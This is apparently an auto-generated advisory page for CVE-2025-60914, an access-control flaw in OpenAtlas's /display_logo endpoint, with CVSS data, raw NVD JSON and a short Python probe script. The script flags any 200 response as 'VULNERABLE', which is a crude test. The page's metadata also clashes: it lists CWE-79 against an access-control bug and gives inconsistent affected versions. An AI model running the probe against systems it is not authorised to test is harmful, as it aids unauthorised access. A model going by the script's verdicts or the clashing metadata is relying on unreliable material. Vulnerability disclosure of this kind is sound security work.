Security Vulnerability Report
中文
CVE-2025-60914 CVSS 4.6 MEDIUM

CVE-2025-60914

Published: 2025-11-24 16:15:51
Last Modified: 2025-11-28 16:22:35

Description

Incorrect access control in Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to access sensitive information via sending a crafted GET request to the /display_logo endpoint.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:* - VULNERABLE
Openatlas < v8.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60914 PoC - Openatlas Incorrect Access Control # Target: /display_logo endpoint target_url = "http://target-server.com" poc_path = "/display_logo" def check_vulnerability(url): """Check if target is vulnerable to CVE-2025-60914""" try: # Crafted GET request to /display_logo endpoint full_url = f"{url}{poc_path}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "*/*" } response = requests.get(full_url, headers=headers, timeout=10) # Check for successful access (200 OK) which indicates vulnerability if response.status_code == 200: print(f"[+] Target is VULNERABLE to CVE-2025-60914") print(f"[+] Sensitive information may be exposed at: {full_url}") print(f"[+] Response length: {len(response.content)} bytes") return True else: print(f"[-] Target appears NOT vulnerable (Status: {response.status_code})") return False except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = target_url check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60914", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:50.530", "lastModified": "2025-11-28T16:22:35.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to access sensitive information via sending a crafted GET request to the /display_logo endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.12.0", "matchCriteriaId": "31077621-F722-46FF-9FFA-CD3D23CD1479"}]}]}], "references": [{"url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-unautorisierter-zugriff-display_logo/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sec4you-pentest.com/schwachstellen/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}